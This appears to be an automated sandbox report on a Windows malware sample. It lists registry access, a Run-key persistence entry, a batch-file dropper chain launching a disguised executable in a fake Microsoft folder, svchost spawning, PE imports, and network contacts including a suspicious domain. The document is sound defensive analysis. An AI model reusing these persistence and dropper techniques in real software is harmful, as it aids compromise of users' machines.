HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\742C3192E607E424EB4549542BE1BBC53E6174E2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\742C3192E607E424EB4549542BE1BBC53E6174E2\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\85371CA6E550143DCE2803471BDE3A09E8F8770F
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\85371CA6E550143DCE2803471BDE3A09E8F8770F\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\97817950D81C9670CC34D809CF794431367EF474
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\97817950D81C9670CC34D809CF794431367EF474\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D23209AD23D314232174E40D7F9D62139786633A
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D23209AD23D314232174E40D7F9D62139786633A\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DE28F4A4FFE5B92FA3C503D1A349A7F9962A8212
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DE28F4A4FFE5B92FA3C503D1A349A7F9962A8212\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\CTLs
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates\Root
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\Root\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\Root\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\Root\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\Root\PhysicalStores
HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\Root
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Root\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Root\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Root\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\SmartCardRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\SmartCardRoot
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\SmartCardRoot\
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\TrustedPeople\PhysicalStores
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\TrustedPeople
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\TrustedPeople\
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\TrustedPeople
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\TrustedPeople\PhysicalStores
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\TrustedPeople
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates\TrustedPeople
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\TrustedPeople\PhysicalStores
HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\TrustedPeople
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\TrustedPeople\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\TrustedPeople\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\TrustedPeople\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\TrustedPeople\CTLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\trust\PhysicalStores
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\trust
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\trust\
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\trust\Certificates
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\trust\CRLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\trust\CTLs
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\trust
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\trust\Certificates
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\trust\CRLs
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\trust\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\trust\PhysicalStores
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\trust
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\trust\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates\trust
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\trust\PhysicalStores
HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\trust
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Trust\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Trust\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Trust\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Trust\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Diagnostics
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserenvDebugLevel
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\GpSvcDebugLevel
HKEY_LOCAL_MACHINE\System\Setup
HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemSetupInProgress
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\UrlDllGetObjectUrl
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\UrlDllGetObjectUrl
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates\AuthRoot
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\LogLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\LogMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\LogMaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllImportPublicKeyInfoEx
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllImportPublicKeyInfoEx
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllConvertPublicKeyInfo
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllConvertPublicKeyInfo
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllVerifyCertificateChainPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CertDllVerifyCertificateChainPolicy
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\Escalation
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\WMR
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledProcesses\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\79B55E88
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledSessions\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession
HKEY_LOCAL_MACHINE\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\WinHttpSettings
HKEY_LOCAL_MACHINE\Software\Microsoft\Ole
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\MaximumAllowedAllocationSize
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Class\{4d36e972-e325-11ce-bfc1-08002be10318}
HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Internet Settings\Wpad
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-0c-29-dc-04-c0
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\EnableInetUnknownAuth
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllVerifyEncodedSignature
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllVerifyEncodedSignature
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllImportPublicKeyInfoEx2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllImportPublicKeyInfoEx2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllEncodeObjectEx
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObjectEx
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObjectEx\1.2.840.113549.1.9.16.1.1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObjectEx\1.2.840.113549.1.9.16.2.1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObjectEx\1.2.840.113549.1.9.16.2.11
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObjectEx\1.2.840.113549.1.9.16.2.12
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObjectEx\1.2.840.113549.1.9.16.2.2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObjectEx\1.2.840.113549.1.9.16.2.3
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObjectEx\1.2.840.113549.1.9.16.2.4
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\Scr
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\Keys
\xe4\xa4\x90\xe2\xb0\x80
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\TorClient
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableSPDY3_0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\KnownClasses
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\crypt32\DebugHeapFlags
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LDAP\LdapClientIntegrity
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LDAP\UseOldHostResolutionOrder
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LDAP\UseHostnameAsAlias
DisableUserModeCallbackFilter
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\dnshdrt
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\Client
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\Generation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DisableUNCCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\EnableExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DelayedExpansion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DefaultColor
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\CompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\PathCompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\AutoRun
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DisableUNCCheck
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DefaultColor
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-GB
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-GB
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000809
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\Ini
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\Temp
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\SCHANNEL\UserContextLockCount
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\SCHANNEL\UserContextListCount
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.44.3.4!7\Name
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\MUI\StringCacheSettings\StringCacheGeneration
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@%SystemRoot%\system32\p2pcollab.dll,-8042
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.47.1.1!7\Name
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@%SystemRoot%\system32\qagentrt.dll,-10
"C:\Users\user\AppData\Local\Temp\F9FA\7CDD.bat" "C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\KMHJVI~1.EXE"
cmd /c ""C:\Users\user\AppData\Local\Temp\F9FA\7CDD.bat" "C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\KMHJVI~1.EXE""
C:\Users\user\AppData\Local\Temp\F9FA\7CDD.bat "C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\KMHJVI~1.EXE"
cmd /C ""C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\KMHJVI~1.EXE""
"C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\KMHJVI~1.EXE"
C:\Windows\system32\svchost.exe
sneddddga
{50A27A48-6F11-0210-7984-1356BDF8F7EA}
{A0162A70-7FD9-D298-09D4-23264D4807BA}

PE Information

Image Base 0x00400000
Entry Point 0x00405493
Reported Checksum 0x000578ee
Actual Checksum 0x000578ee
Minimum OS Version 5.1
Compile Time 2016-05-10 03:04:39
Import Hash cc79e5d1893e37143e121d47aeb51eb4

Sections

Name Virtual Address Virtual Size Size of Raw Data Characteristics Entropy
.text 0x00001000 0x00008212 0x00008400 IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ 5.36
.data 0x0000a000 0x000006ca 0x00000800 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 0.64
.rsrc 0x0000b000 0x00045910 0x00045a00 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 8.00

Imports

Library advapi32.dll:
0x402000 CryptSignHashA
0x402004 InitializeAcl
0x402008 RegReplaceKeyW
0x40200c RegSaveKeyA
0x402010 IsTextUnicode
0x402014 RegCreateKeyExA
0x402018 RegLoadKeyA
0x40201c LogonUserA
0x402020 RegEnumKeyA
0x402024 OpenEventLogW
0x402028 ReadEventLogA
0x40202c RegRestoreKeyA
0x402030 RegUnLoadKeyW
Library kernel32.dll:
0x402038 GetProcAddress
0x40203c OpenWaitableTimerW
0x402040 GetTempPathA
0x402044 CreateFileW
0x402048 GetCurrencyFormatA
0x40204c FindResourceExW
0x402050 IsBadWritePtr
0x402054 InterlockedExchange
0x402058 FindFirstFileW
0x40205c GetFullPathNameW
0x402060 GetProfileStringA
0x402064 GlobalAddAtomW
0x402068 LoadLibraryExA
0x40206c SetEvent
0x402070 GetModuleHandleA
0x402074 CreateMutexA
0x402078 GetPriorityClass
0x40207c ReadFile
0x402080 lstrcmp
0x402084 GetConsoleTitleA
0x402088 CreateFileMappingW
0x40208c ResumeThread
0x402090 OpenMutexA
0x402094 FormatMessageW
0x402098 CreateSemaphoreW
0x4020a8 GetConsoleAliasA
0x4020ac GetStartupInfoA
0x4020b0 ReadConsoleW
0x4020b8 FindNextFileA
Library mprapi.dll:
0x4020c0 MprInfoBlockAdd
0x4020c4 MprAdminDeviceEnum
0x4020c8 MprInfoBlockFind
Library crypt32.dll:
0x4020d0 CryptMemFree
0x4020d8 CertFindExtension
0x4020e0 CertCloseStore
0x4020e4 CryptFindOIDInfo
0x4020e8 CertControlStore
0x4020ec CertDuplicateStore
0x4020f0 CryptDecodeMessage
0x4020f8 CertGetNameStringA
0x402104 CertAlgIdToOID
0x402108 CryptMemAlloc
Library certcli.dll:
0x402110 CACloseCA
0x402114 CAEnumFirstCA

This file is not on VirusTotal.

Process Tree

  • KmHJvidHgRX.exe 3064
    • cmd.exe 1016 cmd /c ""C:\Users\user\AppData\Local\Temp\F9FA\7CDD.bat" "C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\KMHJVI~1.EXE""
      • cmd.exe 2888 cmd /C ""C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\KMHJVI~1.EXE""
        • corrawex.exe 2980 "C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\KMHJVI~1.EXE"
  • explorer.exe 1708

KmHJvidHgRX.exe, PID: 3064, Parent PID: 2584
Full Path: C:\Users\user\AppData\Local\Temp\KmHJvidHgRX.exe
Command Line: "C:\Users\user\AppData\Local\Temp\KmHJvidHgRX.exe"
cmd.exe, PID: 1016, Parent PID: 3064
Full Path: C:\Windows\SysWOW64\cmd.exe
Command Line: cmd /c ""C:\Users\user\AppData\Local\Temp\F9FA\7CDD.bat" "C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\KMHJVI~1.EXE""
cmd.exe, PID: 2888, Parent PID: 1016
Full Path: C:\Windows\SysWOW64\cmd.exe
Command Line: cmd /C ""C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\KMHJVI~1.EXE""
corrawex.exe, PID: 2980, Parent PID: 2888
Full Path: C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
Command Line: "C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\KMHJVI~1.EXE"
svchost.exe, PID: 1308, Parent PID: 2980
Full Path: C:\Windows\sysnative\svchost.exe
Command Line: C:\Windows\system32\svchost.exe
explorer.exe, PID: 1708, Parent PID: 1660
Full Path: C:\Windows\explorer.exe
Command Line: C:\Windows\Explorer.EXE

Hosts

Direct IP Country Name
Y 8.8.8.8 [VT] United States
N 23.202.161.73 [VT] United States
N 192.42.116.41 [VT] Netherlands
N 192.229.232.240 [VT] United States
N 185.85.0.29 [VT] Germany

TCP

Source Source Port Destination Destination Port
192.168.35.22 49179 185.85.0.29 www.php.net 80
192.168.35.22 49180 185.85.0.29 www.php.net 443
192.168.35.22 49206 185.85.0.29 www.php.net 80
192.168.35.22 49208 185.85.0.29 www.php.net 443
192.168.35.22 49185 192.229.232.240 www.download.windowsupdate.com 80
192.168.35.22 49211 192.229.232.240 www.download.windowsupdate.com 80
192.168.35.22 49207 192.42.116.41 groupcreatedt.at 80
192.168.35.22 49191 23.202.161.73 www.microsoft.com 80
192.168.35.22 49192 23.202.161.73 www.microsoft.com 80

UDP

Source Source Port Destination Destination Port
192.168.35.22 53004 8.8.8.8 53
192.168.35.22 58774 8.8.8.8 53
192.168.35.22 59887 8.8.8.8 53
192.168.35.22 61809 8.8.8.8 53
192.168.35.22 63733 8.8.8.8 53

DNS

Name Response Post-Analysis Lookup
www.php.net [VT]
  A 185.85.0.29 [VT]
  CNAME www-php-net.ax4z.com [VT]
www.download.windowsupdate.com [VT]
  CNAME cs12.wpc.v0cdn.net [VT]
  A 192.229.232.240 [VT]
  CNAME 2-01-3cf7-0009.cdx.cedexis.net [VT]
  CNAME wu.ec.azureedge.net [VT]
  CNAME wu.wpc.apr-52dd2.edgecastdns.net [VT]
  CNAME wu.azureedge.net [VT]
www.microsoft.com [VT]
  CNAME www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net [VT]
  CNAME e13678.dspb.akamaiedge.net [VT]
  CNAME www.microsoft.com-c-3.edgekey.net [VT]
  A 23.202.161.73 [VT]
groupcreatedt.at [VT]
  A 192.42.116.41 [VT]

HTTP Requests

URI Data
http://www.php.net/license/3_0.txt
GET /license/3_0.txt HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: www.php.net

http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1
Cache-Control: max-age = 86402
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Wed, 19 Apr 2017 22:43:31 GMT
If-None-Match: "80ab755e5eb9d21:0"
User-Agent: Microsoft-CryptoAPI/6.1
Host: www.download.windowsupdate.com

http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
GET /pki/certs/MicRooCerAut_2010-06-23.crt HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: www.microsoft.com

http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
